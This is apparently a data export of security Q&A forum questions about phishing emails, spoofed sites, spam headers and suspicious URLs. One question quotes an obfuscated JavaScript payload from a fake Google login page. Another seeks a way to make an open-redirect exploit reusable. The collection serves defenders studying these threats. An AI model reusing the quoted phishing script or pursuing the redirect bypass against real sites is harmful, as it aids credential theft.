 On checking further, I found this &lt;a href="https://twitter.com/x0rz/status/940583568245510146?lang=en" rel="nofollow noreferrer"&gt;twitter post&lt;/a&gt; which states that the domain &lt;code&gt;shnpoc.net&lt;/code&gt; is owned by &lt;a href="https://www.skyhighnetworks.com/" rel="nofollow noreferrer"&gt;Sky High Networks&lt;/a&gt; which is a subsidiary of McAfee.&lt;/p&gt;
 &lt;p&gt;These are a few more domains:&lt;br&gt;
  1. &lt;a href="https://pastebin.com/v3dS2YNK" rel="nofollow noreferrer"&gt;Suspicious shnpoc.net domains&lt;/a&gt;&lt;br&gt;
  2. &lt;a href="https://pastebin.com/ZqeVLzME" rel="nofollow noreferrer"&gt;Some more&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;My website URL is not in the list, but it has a similar sudomain, something of the sort of &lt;code&gt;https://xxxx.yyyy.xxx.vignesh.shnpoc.net&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;On checking SSL certificate some have &lt;code&gt;Skyhigh Networks Inc.&lt;/code&gt; in owners name and some have &lt;code&gt;McAfee LLC&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;What are these URLs? Are these phishing URLs? &lt;/p&gt;
 &lt;p&gt;I don't understand why SHN or McAfee needs to have these URLs?&lt;br&gt;
 Can anyone help me understand, what's all this? Whats happening?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;man-in-the-middle&gt;&lt;proxy&gt;&lt;phishing&gt;&lt;url&gt;</t>
  </si>
  <si>
    <t>Making a content injection target</t>
  </si>
  <si>
    <t>&lt;p&gt;I don't know much about content injection so I'm hoping to draw on the experience of the community here. I'm writing a tool that evaluates public web proxies. I want to know if the proxies are being used for content injection and other attacks. I.e. to determine if they are injecting malware, phishing attacks, or spam into the page being requested via the proxy. I need to determine which ones I can trust to use myself. I'm the only client.&lt;/p&gt;
 &lt;p&gt;To do this, I want to make a webpage that is the biggest target possible (AKA honeypot) in order to encourage the proxies to do their content injection if they do it at all. I'd like to know if there are there certain keywords, content, or ways to structure a web page that will &lt;em&gt;encourage&lt;/em&gt; content injection. For example, I could have phrases like 'hot girls' in order to encourage porn and viagra advertisements. Or have frames and iframes in the body of the page in order to give the attackers a place to put the content.&lt;/p&gt;
 &lt;p&gt;At my end I will compare what was returned by the proxy with what I expect in order to determine if the proxy is changing the content at all.&lt;/p&gt;
 &lt;p&gt;I already check to see if certificates are changed. I mostly care about the fidelity of the page content.&lt;/p&gt;
 &lt;p&gt;What else should I do?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;man-in-the-middle&gt;&lt;injection&gt;&lt;honeypot&gt;&lt;http-proxy&gt;</t>
  </si>
  <si>
    <t>Who do I inform when a website is compromised</t>
  </si>
  <si>
    <t>&lt;p&gt;I often receive phishing emails claiming to be big companies like PayPal. &lt;/p&gt;
 &lt;p&gt;When I check the link I remove anything which could be used to confirm that it was me who clicked and open the link in a virtual machine. &lt;/p&gt;
 &lt;p&gt;Most of the time the fake sites look to be hosted by small companies. Most likely hacked in some way. &lt;/p&gt;
 &lt;p&gt;Who should I inform when I think that a site has been compromised? &lt;/p&gt;
 &lt;p&gt;In the past I have informed the owner and the registrar but never get a response. &lt;/p&gt;</t>
  </si>
  <si>
    <t>Open redirection unique token bypass</t>
  </si>
  <si>
    <t>&lt;p&gt;I am currently analyzing one job portal web application in which there is an open redirect vulnerability. Vulnerability description is as follows:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Request type: GET
 Vulnerable Parameter: dest
 Secondary Parameter: passrx
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;If I follow full method to exploit this vulnerability, then vulnerability will be exploited successfully. If I copy this URL from burpsuite and give that URL to someone else after crafting it then it wont be executed successfully as this URL also passes another parameter named &lt;code&gt;passrx&lt;/code&gt; with unique encrypted token.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;passrx=B8mzzG-GnM-hDJcYWj-0ByLGNpApDhHXQQw1WbYx7LFpG6MP60mL03oy7kVkvr21q-zlShJ38tNdUgPqQHATvb_U2IE4NzzWgqDjagHiMaxxirl583vfQ5N6Neypw7eYOyu8ihuu3tn8EGcTDPUishb6EZQ=.
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The value of this parameter is unique every time. For this vulnerability no user authentication is needed. I tried couple of bypasses as follows:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;I removed the &lt;code&gt;passrx&lt;/code&gt; parameter along with its value and forwarded request to the server. It gave me a 404 error page.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;I tried to decode the value of &lt;code&gt;passrx&lt;/code&gt; parameter. I was unable to find any decoding algorithm and since the token is unique every time it did not help me out.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;I started executing whole scenario again with the help of burpsuite. When I got this request in burpsuite, I dropped the request and didn't froward to server in order to not use that unique token. I copied URL and gave to my friend who is residing in adjacent network and hoped that since token was not used, it might be executed now by my friend who is residing in an adjacent network. It also gave him a 404 error page.&lt;/p&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Since this is a non-persistent scenario, is there any way by which I can make this persistent and able to be exploited over a remote or adjacent network?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;url-redirection&gt;</t>
  </si>
  <si>
    <t>How to report getting an offer to put malware in my code</t>
  </si>
  <si>
    <t>&lt;p&gt;I received an email with the following offer.&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Alina Schatalina wrote: Would you consider adding our script inside your extension and get monthly payments for it? Our script will inject hidden and safe ads inside browser. These ads can't be noticed by user or Chrome Store. For current number of user we will pay you 300 USD each month, and you can still keep extension...&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I can't find Google's email address for reporting this to Google. Technically, it's not phishing, or Spam. And if I did that, presumably it would just load into the filters. I think Google might like to investigate this person a bit more.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;</t>
  </si>
  <si>
    <t>How easy is it, really, to be hacked as an average user?</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;strong&gt;&lt;em&gt;tl;dr at the bottom&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;I have been searching around and I haven't been able to find a definitive answer to the question(s). I mainly work with OS X so that will be the base for my questions. &lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;How easy is it to be hacked if you're behind a standard router (Airport for example) if you haven't visited a phishing site and you haven't downloaded and installed any malicious software, and have a good password mixing caps, numbers, and symbols, and keeping my machine up to date? &lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;From what I understand, most security holes are started because the end-user gives access by doing something like those two examples.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;tl;dr:&lt;/strong&gt;
 &lt;em&gt;What are the actual chances of attack on the average user using average software, with secure passwords and average hardware setups without the aid of phishing, the attacker gaining physical access, or a malicious file being applied by the target user after it was sent to them from the attacker?&lt;/em&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;threats&gt;&lt;vulnerability&gt;</t>
  </si>
  <si>
    <t>Can a zipped malware execute?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a malicious file zipped in .gz which was not opened. However, when I tried to delete the folder containing the file, I wasn't able to due to running processes. Can a zipped malware execute itself in Windows?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;phishing&gt;&lt;zip&gt;&lt;process&gt;&lt;code-execution&gt;</t>
  </si>
  <si>
    <t>Phishing? All websites show the same, wrong certificate</t>
  </si>
  <si>
    <t>&lt;p&gt;today I went to my Online-Banking by typing in the correct domain name in Firefox. I could login and even see my actual balance.
 Then within the site a warning appeared that I should do a test-transfere for security reasons (over 7200‚Ç¨...).
 I didn't do this, but was wondering, because I still stayed on the original domain.&lt;/p&gt;
 &lt;p&gt;Checking the certificate showed me this (wrong, but valid. To compare with the original one: &lt;a href="https://www.sparkasse-suedpfalz.de" rel="nofollow noreferrer"&gt;https://www.sparkasse-suedpfalz.de&lt;/a&gt;):&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/nobgx.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/nobgx.jpg" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;This type of certificate appears on every website I visit (inkluding stackexchange.com or google.com).: Instead of a certificate for [DOMAIN] i get one of *.[DOMAIN], where the CA is VeriSign.:
 &lt;a href="https://i.stack.imgur.com/pVdgA.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/pVdgA.jpg" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;It happens with all browsers (Firefox, chrome, edge), but not with TOR.
 The OS is Windows 10 Pro, Version 10.0.19042 Build 19042&lt;/p&gt;
 &lt;p&gt;I dont have any issues on an other machines in the same intranet.&lt;/p&gt;
 &lt;p&gt;Are all requests from this computer send to a proxy? And how do they manage to insert fake requests to send money to the original domain?
 Happy if you have an idea what to do.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;certificates&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>What is the purpose of a targeted email without any meaningful content?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received an email to my corporate email account from an external Gmail account.&lt;/p&gt;
 &lt;p&gt;The list of recipients clearly shows (an eventually successful) attempt to guess my email address based on my personal information (nothing confidential ‚Äî all of it is semi-publicly available on LinkedIn), including a correct internal domain name.&lt;/p&gt;
 &lt;p&gt;However, the email itself did not contain anything meaningful - both subject and body contained a single word (which was the corporate name). There were no links, trackers, attachments, or even an attempt to make me respond.&lt;/p&gt;
 &lt;p&gt;That left me a little puzzled ‚Äî by the looks of it, non-trivial effort was put in crafting this email ‚Äî what would an attacker gain from it?&lt;/p&gt;</t>
  </si>
  <si>
    <t>CVV Credit Card Phishing</t>
  </si>
  <si>
    <t>&lt;p&gt;Caller 18777348472 had my name &amp;amp; last 4 digits of my credit card and indicated he was from fraud prevention: someone tried to charge $600 through Amazon. He asked me to verify that I had the card in hand by providing him the CVV (3-digit number on back of card). If I have the card and it should be enough that I state this. He gently threatened that the card would be suspended and I agreed that it was OK to cancel the card.&lt;/p&gt;
 &lt;p&gt;I refused to provide the CVV because if I do not know who is calling and I do not give out sensitive info. As I understand it, caller ID is easily faked with an App. &lt;/p&gt;
 &lt;p&gt;Red flags include asking 3 times for the CVV and trying to convince me that the phone number is proof of identity.&lt;/p&gt;
 &lt;h1&gt;QUESTIONS&lt;/h1&gt;
 &lt;ul&gt;
 &lt;li&gt;Does the CVV enable escalation privilege (change address / phone / email)&lt;/li&gt;
 &lt;li&gt;What are the 3 most common techniques for the phisherman to gain my
 name, phone-number and 4 digits of my credit card?&lt;/li&gt;
 &lt;li&gt;Is it reasonable to assume that he has all 16 digits since he is
 asking for the CVV (time to change the card number).&lt;/li&gt;
 &lt;li&gt;If caller found a receipt with my name, how difficult would it to acquire my phone number?&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;credit-card&gt;</t>
  </si>
  <si>
    <t>Analyzing the body of this spam message</t>
  </si>
  <si>
    <t>&lt;p&gt;I recently received this email, from what looks like to be an unprofessional hacker:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Cannot display full mail body.&lt;/p&gt;
  &lt;p&gt;You will see it when pushing &lt;strong&gt;&lt;a href="http://example.com/" rel="nofollow"&gt;here&lt;/a&gt;&lt;/strong&gt; &lt;sup&gt;&lt;em&gt;Sanitized link. Leads to example.com&lt;/em&gt;&lt;/sup&gt;&lt;/p&gt;
  &lt;p&gt;&lt;sup&gt;&lt;code&gt;Gmail error message: 3b19866 (Tue Aug 2 8:56:45 2016)&lt;/code&gt;&lt;/sup&gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&lt;sup&gt;(formatting replicated)&lt;/sup&gt; &lt;/p&gt;
 &lt;p&gt;The title is &lt;code&gt;leased&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;Note that this managed to bypass Google's spam filter and landed right in my "Primary" inbox.&lt;/p&gt;
 &lt;p&gt;It comes from an obviously personal email (---@gmail.com). &lt;s&gt;&lt;strong&gt;I have no relations with this person.&lt;/strong&gt;&lt;/s&gt; Actually, it's plausible this person had me on their address book.&lt;/p&gt;
 &lt;p&gt;The linked site varies between clicks. One looked a lot like the natural Google login page, but with an actual password field a wrong size. Another was an obvious typical "YOUR COMPUTER HAS BEEN HACKED BLAH BLAH BLAH" site. &lt;/p&gt;
 &lt;p&gt;My question is: how could this have passed by my spam filter and what's up with the hidden HTML at the end, as well as the weird HTML attributes?&lt;/p&gt;
 &lt;p&gt;Here's some more proof that the hacker is unprofessional. In the raw HTML version of the message, there's this:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;input type="hidden" name="zewomugo" value="you look at the check feel the feelings of having that money now "&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;There are some weird class and id names hidden in the HTML version. They seem semi-random, but contain vowels.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;voyoveho
 fe
 gamofuda
 zewomugo
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I get nothing when running it through Google Translate, and a quick google shows that they aren't words.&lt;/p&gt;
 &lt;p&gt;The "Gmail error message part" is wrapped in &lt;code&gt;muted&lt;/code&gt; and &lt;code&gt;samp&lt;/code&gt; tags. What could that mean, since &lt;code&gt;muted&lt;/code&gt; isn't even a HTML tag?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Did scammers take control of a subdomain to host phishing site?</t>
  </si>
  <si>
    <t>&lt;p&gt;This morning I received a text message (ostensibly) from my bank:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;We need to contact you. Please visit &lt;a href="https://paymentassistance.nationwide.co.uk" rel="nofollow"&gt;https://paymentassistance.nationwide.co.uk&lt;/a&gt; for more information&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;My spidey sense immediately tingled. I've never received an SMS from my bank before, and when they email me they always use my name and post code. However nationwide.co.uk is the correct domain for my bank. Out of curiosity (and with a healthy scepticism) I typed the URL on my computer.&lt;/p&gt;
 &lt;p&gt;Is it a phishing site?&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;It uses the same theme and colours as the familiar website &lt;a href="http://www.nationwide.co.uk" rel="nofollow"&gt;http://www.nationwide.co.uk&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;It has a https URL (certificate from Symantec)&lt;/li&gt;
 &lt;li&gt;It has links to the familiar website in its footer, but its own version of the 'contact us' page with an alternate phone number 0800 464 3050. Compare &lt;a href="https://paymentassistance.nationwide.co.uk/doc/contactUs" rel="nofollow"&gt;https://paymentassistance.nationwide.co.uk/doc/contactUs&lt;/a&gt; with &lt;a href="http://www.nationwide.co.uk/support/contact-us/call-us#xtab:credit-cards" rel="nofollow"&gt;http://www.nationwide.co.uk/support/contact-us/call-us#xtab:credit-cards&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;That phone number only appears on that page and not on the familiar website or elesewhere on the web. It differs from the number printed on my card (0800 055 66 11) &lt;/li&gt;
 &lt;li&gt;The form asks for your name, address and last four digits of your credit card number (not the whole thing)&lt;/li&gt;
 &lt;li&gt;If you try to login (I used made up data) it fails and asks you to phone them (on the suspicious number)&lt;/li&gt;
 &lt;li&gt;If you phone the number a recording answers "Welcome to Nationwide credit card services. Your call may be recorded for quality and training purposes." &lt;/li&gt;
 &lt;li&gt;The recording then asks for all 16 digits of your credit card number.&lt;/li&gt;
 &lt;li&gt;After entering a made-up 16 digit number, a friendly lady calling herself Kelly answered the phone. I hung up.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;If this is phishing, I don't understand:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;How did scammers take control of a subdomain? Have they hacked Nationwide's computers? (DNS servers?)&lt;/li&gt;
 &lt;li&gt;How did they get an SSL certificate for it?&lt;/li&gt;
 &lt;/ol&gt;
 &lt;hr&gt;
 &lt;p&gt;It looks like this page has been running since at least January 2014:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;a href="http://www.unknownphone.com/search.php?num=02033222992" rel="nofollow"&gt;http://www.unknownphone.com/search.php?num=02033222992&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a href="http://www.cookham.com/cookhamnow/bustrain/police/crime20140129.htm" rel="nofollow"&gt;http://www.cookham.com/cookhamnow/bustrain/police/crime20140129.htm&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a href="https://twitter.com/sophielambrakis/status/464730297838604288" rel="nofollow"&gt;https://twitter.com/sophielambrakis/status/464730297838604288&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;The Twitter user asked the bank about it, but they didn't reply.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;certificates&gt;&lt;phishing&gt;&lt;dns-domain&gt;</t>
  </si>
  <si>
    <t>Spam Email with Script not Flagged</t>
  </si>
  <si>
    <t>&lt;p&gt;Our office received an email over Christmas. There was what appeared to be a PDF file attached. &lt;/p&gt;
 &lt;p&gt;When we examined the file it was actually a Html file for a spoof google login page.&lt;/p&gt;
 &lt;p&gt;It also had a large amount of encoded &lt;code&gt;&amp;lt;Script&amp;gt;&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;The decoded script is:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.2.b="8\'a g r l";k{(j(){m 1=3.2.n(\'1\');1.p=\'o/x-4\';1.i=\'9 4\';1.h=\'6://c.f/d/q/D/H.G\';2.s(\'F\')[0].I(1)}())}J(e){}3.2.K.L="&amp;lt;5 E=\"6://w.v/u/t.y\" z=\"C: 0;B: 7%;A:7%\"&gt;";',48,48,'|link|document|window|icon|iframe|http|100|You|shortcut|ve|title|kitt|assets||ai|been|href|rel|function|try|out|var|createElement|image|type|img|signed|getElementsByTagName|daiso|vasdu|top|bowlanreedesntal||html|style|height|width|border|guoguo|src|head|ico|google|appendChild|catch|body|outerHTML'.split('|'),0,{}&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Interestingly the URL in the HTML file was to the correct &lt;a href="https://accounts.google.com/ServiceLogin?service=mail&amp;amp;passive=true&amp;amp;rm=false&amp;amp;continue" rel="nofollow noreferrer"&gt;google login page&lt;/a&gt; &lt;/p&gt;
 &lt;p&gt;I thought that emails with scripts would be flagged automatically, akin to sending an &lt;code&gt;.exe&lt;/code&gt; or &lt;code&gt;.bat&lt;/code&gt; file&lt;/p&gt;
 &lt;p&gt;Are there any additional precautions we can take to ensure that messages such as this are flagged or moved to spam in future without user intervention?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;spam&gt;&lt;phishing&gt;&lt;encoding&gt;</t>
  </si>
  <si>
    <t>Information on the Elderwood Project/Platform</t>
  </si>
  <si>
    <t>&lt;p&gt;I've read &lt;a href="https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf" rel="nofollow"&gt;Symantec's whitepaper&lt;/a&gt; on the Elderwood Project and the &lt;a href="http://www.symantec.com/connect/blogs/how-elderwood-platform-fueling-2014-s-zero-day-attacks" rel="nofollow"&gt;blog update on the Elderwood Platform&lt;/a&gt;. They both make for a very interesting read, especially in the zero-day exploit meta-analysis that found the Elderwood Platform.&lt;/p&gt;
 &lt;p&gt;Does anyone know of, or have a bibliography on Elderwood? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;attacks&gt;&lt;phishing&gt;&lt;attack-vector&gt;&lt;zero-day&gt;&lt;cyber-warfare&gt;</t>
  </si>
  <si>
    <t>How to check whether a link is safe or not?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've been working on a task to find threats in a social network called &lt;em&gt;Skyrock&lt;/em&gt;. For which, I've managed to retrieve a significant amount of URLs by crawling various user profiles and parsing the data for URLs. These URLs basically are a part of data, that some of the users share publicly on the network. Now, I want to check whether any of these URLs is malicious or not.&lt;/p&gt;
 &lt;p&gt;I know there are a lot of online url scanners available on the internet to scan for a malicious link, but don't want to use any of those. Instead, I want to use information which am able retrieve about a URL, using some third party API, for example: &lt;strong&gt;location&lt;/strong&gt; (lat, long), &lt;strong&gt;url redirects&lt;/strong&gt;, &lt;strong&gt;redirect count&lt;/strong&gt;, &lt;strong&gt;DNS entries&lt;/strong&gt; etc. Can any of these properties be used to check if a particular URL is malicious or not? What other information about a link do I need to check if it's malicious or not?&lt;/p&gt;
 &lt;p&gt;Note: A malicious link, in this case, could be a link to a phishing site, a spam link, or either a link that makes you download some malware. I just want to know what properties related to a link are useful in figuring out whether a link falls under these categories of malice or not.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;web-browser&gt;&lt;http&gt;&lt;url-redirection&gt;</t>
  </si>
  <si>
    <t>How did this email list a fake recipient?</t>
  </si>
  <si>
    <t>&lt;p&gt;My friend recently received a suspicious email for an iTunes gift card purchase from "Apple Store" with a header that displayed a fake "To:" address for &lt;code&gt;orders@apple-store.com&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/Psucf.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/Psucfm.png" alt="Fake &amp;quot;to&amp;quot; header"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Unsurprisingly, this turned out to be &lt;a href="https://i.stack.imgur.com/jWZXR.png" rel="noreferrer"&gt;a phishing email&lt;/a&gt; with a suspicious "From:" address.&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;From: Apple Store &amp;lt;mystorepaysbills767wf08t7q86tpj1@unpaidpurchaseneedconfirmtocontinue.com&amp;gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I couldn't find any reference to my friend's real email address in the message itself. I've heard of headers having &lt;a href="https://security.stackexchange.com/questions/30732/why-is-it-even-possible-to-forge-sender-header-in-e-mail"&gt;a fake sender address&lt;/a&gt;, but I've never seen an email list a fake recipient.&lt;/p&gt;
 &lt;p&gt;How could my friend have received this email if it was sent to a fake email address?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;spam&gt;&lt;header&gt;</t>
  </si>
  <si>
    <t>Why is a very anonymous spammer exhorting me to "not forget about all my tasks"?</t>
  </si>
  <si>
    <t>&lt;p&gt;I just got spam that in its entirety said: "Hi, don't forget about all my tasks." It's in plain text; there is no hidden content. Fake sender with &lt;em&gt;my&lt;/em&gt; domain name, using a name that I do not have in my previous collection of spam. (I save it all for a month, in case of filter mismatches and some amount of morbid curiosity.) What could be the possible angle here?&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Return-Path: &amp;lt;AmericanExpress@welcome.aexp.com&amp;gt;
 X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on example.edu
 X-Spam-Status: No, score=2.3 required=5.0 tests=BAYES_05,BOGO_T25_HAM,
  FSL_HELO_NON_FQDN_1,HEADER_FROM_DIFFERENT_DOMAINS,RCVD_IN_BRBL_LASTEXT,
  RDNS_NONE,SPF_FAIL,TO_EQ_FM_DOM_SPF_FAIL,TVD_RCVD_SINGLE autolearn=no
  autolearn_force=no version=3.4.0
 X-Spam-Level: xx
 X-Original-To: mattdm@example.org
 Delivered-To: mattdm@example.example.org
 Received: from KVKRYIUZS (unknown [113.105.180.234])
  by example.example.org (Postfix) with ESMTP id 2F21785E4E11
  for &amp;lt;mattdm@example.org&amp;gt;; Mon, 9 Jan 2017 12:49:11 -0500 (EST)
 Message-ID: &amp;lt;ZA6SW6MK.8115640@welcome.aexp.com&amp;gt;
 Date: Tue, 10 Jan 2017 01:16:51 +0800
 From: Jacob Lamothe &amp;lt;Jacob.Lamothe@example.org&amp;gt;
 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101
  Thunderbird/24.2.0
 MIME-Version: 1.0
 To: attdm@example.org
 Subject: Hello from Lamothe
 Content-Type: text/plain; charset=ISO-8859-1; format=flowed
 Content-Transfer-Encoding: 7bit
 Hi, don't forget about all my tasks.
 Thanks.
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;That's it ‚Äî no other message parts. I replaced my domain with &lt;code&gt;example.org&lt;/code&gt;. All of the &lt;code&gt;X-&lt;/code&gt; headers are legit and from my own system. The "Return-Path" envelope header is interesting, as a quick search sees that implicated in several phishing attacks.&lt;/p&gt;
 &lt;p&gt;I &lt;em&gt;do&lt;/em&gt; have a couple of other messages with that same Return-Path. They are virtually identical, and look like:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Return-Path: &amp;lt;AmericanExpress@welcome.aexp.com&amp;gt;
 X-Original-To: mattdm@example.org
 Delivered-To: mattdm@example.example.org
 Received: from 80.red-80-34-69.staticip.rima-tde.net
  (80.red-80-34-69.staticip.rima-tde.net [80.34.69.80])
  by example.example.org (Postfix) with ESMTP id 10B988048645
  for &amp;lt;mattdm@example.org&amp;gt;; Thu, 22 Dec 2016 17:23:33 -0500 (EST)
 Received: from [145.214.112.131] (port=28899 helo=[10.0.4.34]) by 80.34.69.80
  with asmtp id 1rqLaL-000MX-00 for mattdm@example.org; Thu, 22 Dec 2016
  22:50:38 +0100
 Message-ID: &amp;lt;399761218.20161222215038@welcome.aexp.com&amp;gt;
 Date: Thu, 22 Dec 2016 22:50:38 +0100
 From: Fax Scanner &amp;lt;scanner@example.org&amp;gt;
 MIME-Version: 1.0
 To: mattdm@example.org
 Subject: You have recevied a message
 Content-Type: multipart/mixed;
  boundary="------------050107040507000606080309"
 This is a multi-part message in MIME format.
 --------------050107040507000606080309
 Content-Type: text/plain; charset=ISO-8859-1; format=flowed
 Content-Transfer-Encoding: 7bit
 You have received a message on efax.
 Please download and open document attached.
 Scanner eFax system.
 --------------050107040507000606080309
 Content-Type: application/zip; name="Message efax system-5733.zip"
 Content-Transfer-Encoding: base64
 Content-Disposition: attachment; filename="Message efax system-8631.zip"
  [removed]
  --------------050107040507000606080309
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;"Removed" is a zip file containing a javascript trojan. (Identified by an online scanner as a possible ransomware downloader.) So, maybe there's some relation? But, the headers don't look similar ‚Äî different format for &lt;code&gt;Message-ID&lt;/code&gt;, no &lt;code&gt;User-Agent&lt;/code&gt; in the second, etc. And the came several weeks before the one above. I definitely understand what the fake scans are all about ‚Äî but if they connect to the message above, I can't see how.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;spam&gt;</t>
  </si>
  <si>
    <t>What is httpvh:// and is it the result of something malicious?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was working on a client's old website and I noticed that some of their YouTube links were broken and looked like this:&lt;/p&gt;
 &lt;p&gt;&lt;code&gt;httpvh://www.youtube.com/watch?v=jNQXAC9IVRw&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;At first I assumed it was some kind of typo, but then I realized that:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;They probably didn't manually type the URL&lt;/li&gt;
 &lt;li&gt;It was like this on multiple pages&lt;/li&gt;
 &lt;li&gt;The links were probably correct at some point or else they would have noticed it&lt;/li&gt;
 &lt;li&gt;&lt;a href="https://www.google.com/search?q=httpvh" rel="nofollow noreferrer"&gt;A Google search&lt;/a&gt; shows that quite a few websites, particularly old ones, have this exact same issue.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;It almost seems like some kind of weird find and replace issue, but what kind of legitimate pattern would even cause that?&lt;/p&gt;
 &lt;p&gt;I can't find anything about this, and I'm not sure what kind of harm could come from it (aside from the links being broken). If it was caused by something malicious and the goal was to switch it to a phishing URL, then surely a valid link would have been more effective.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;http&gt;&lt;protocols&gt;&lt;url&gt;</t>
  </si>
  <si>
    <t>Different email address in the email and the cancellation link in "Security alert for your linked Google Account"</t>
  </si>
  <si>
    <t>&lt;p&gt;In order to be able to help my mother, my gmail is listed as a recovery email for her Google account, &lt;code&gt;mother@gmail.com&lt;/code&gt; (not her actual address). &lt;/p&gt;
 &lt;p&gt;Today I received a "Security alert for your linked Google Account" which notified me that someone requested recovery of her account. 
 I first checked with her over the phone whether she might have forgotten her password, but she assured me she hasn't accessed or tried to access that account in some time. &lt;/p&gt;
 &lt;p&gt;The email said that if we didn't request account recovery, we should follow a link.
 I did so, as the email looked legit: sent from &lt;code&gt;no-reply@accounts.google.com&lt;/code&gt;, mailed by &lt;code&gt;gaia.bounces.google.com&lt;/code&gt;, and signed by &lt;code&gt;accounts.google.com&lt;/code&gt;.
 The link led me to accounts.google.com with a green padlock marked in Firefox.&lt;/p&gt;
 &lt;p&gt;The link gave me options to cancel the account recovery process or letting it to proceed. However, &lt;strong&gt;the account to which this recovery was supposed to pertain&lt;/strong&gt; was, confusingly, my father's email, which is not even a gmail address, &lt;code&gt;father@localDomain&lt;/code&gt;. That is, on the top of the page it said that the recovery of account &lt;code&gt;father@localDomain&lt;/code&gt; has been requested. &lt;/p&gt;
 &lt;p&gt;I marked the option to "Stop the account recovery" and very briefly mentioned this problem in a text box that was provided.
